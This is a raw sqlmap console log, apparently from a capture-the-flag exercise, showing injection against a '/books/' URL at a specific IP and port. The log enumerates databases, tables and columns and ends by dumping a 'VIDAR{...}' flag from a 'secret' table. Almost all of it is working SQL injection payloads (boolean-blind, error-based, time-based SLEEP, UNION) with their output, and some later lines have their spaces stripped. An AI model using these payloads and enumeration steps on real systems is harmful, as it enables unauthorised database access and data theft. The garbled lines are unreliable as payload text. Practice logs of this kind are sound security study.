[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:36:38 /2024-10-15/ [10:36:38] [INFO] parsing HTTP request from 'http_payload/1.txt' custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] [10:36:39] [INFO] resuming back-end DBMS 'mysql' [10:36:39] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- - --- [10:36:44] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.6 [10:36:44] [INFO] fetching database names available databases [2]: [*] book [*] information_schema
[10:36:50] [INFO] fetched data logged to text files under 'C:\Users\24993\AppData\Local\sqlmap\output\182.202.178.28'
C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book --tables ___ __H__ ___ ___[.]_____ ___ ___ {1.8.8.6#dev} |_ -| . [(] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @10:39:36 /2024-10-15/
[10:39:36] [INFO] parsing HTTP request from 'http_payload/1.txt' custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y [10:39:39] [INFO] resuming back-end DBMS 'mysql' [10:39:39] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR
Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy
Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- - --- [10:39:45] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.6 [10:39:45] [INFO] fetching tables for database: 'book' Database: book [2 tables] +--------+ | books | | secret | +--------+
C:\Users\24993\Desktop\TZB_Tools\sqlmap-master>python sqlmap.py -r http_payload/1.txt -D book -T secret --columns ___ __H__ ___ ___[(]_____ ___ ___ {1.8.8.6#dev} |_ -| . [,] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @10:40:30 /2024-10-15/
[10:40:30] [INFO] parsing HTTP request from 'http_payload/1.txt' custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y [10:40:32] [INFO] resuming back-end DBMS 'mysql' [10:40:32] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://182.202.178.28:31603/books/1' AND 8054=8054 AND 'ggRL'='ggRL
Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://182.202.178.28:31603/books/1' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND 'ITOR'='ITOR
Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) Payload: http://182.202.178.28:31603/books/1' OR SLEEP(5) AND 'poXy'='poXy
Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: http://182.202.178.28:31603/books/-7734' UNION ALL SELECT 72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- - --- [10:40:37] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.6 [10:40:37] [INFO] fetching columns for table 'secret' in database 'book' Database: book Table: secret [1 column] +--------+-----------+ | Column | Type | +--------+-----------+ | fl4g | char(255) | +--------+-----------+
[!] legaldisclaimer: Usageofsqlmapforattackingtargetswithoutpriormutualconsentisillegal.Itistheenduser's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:41:06 /2024-10-15/ [10:41:06] [INFO] parsing HTTP request from 'http_payload/1.txt' custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y [10:41:08] [INFO] resuming back-end DBMS 'mysql' [10:41:08] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://182.202.178.28:31603/books/1'AND8054=8054AND'ggRL'='ggRL Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: http://182.202.178.28:31603/books/1'ANDGTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(5635=5635,1))),0x71707a7871),5635) AND'ITOR'='ITOR Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) Payload: http://182.202.178.28:31603/books/1'ORSLEEP(5) AND'poXy'='poXy Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: http://182.202.178.28:31603/books/-7734'UNIONALLSELECT72,CONCAT(0x71786b7071,0x574e5979524c73674a4b4153484c427a746c704d734270496263796d685064476b69695678447571,0x71707a7871),72-- - --- [10:41:13] [INFO] theback-endDBMSisMySQL back-endDBMS: MySQL >= 5.6 [10:41:13] [INFO] fetchingentriesofcolumn(s) 'fl4g'fortable'secret'indatabase'book' Database: book Table: secret [1entry] +---------------------------------+ | fl4g | +---------------------------------+ | VIDAR{sqli_C4n_b3_d4ng3r0us!!!} | +---------------------------------+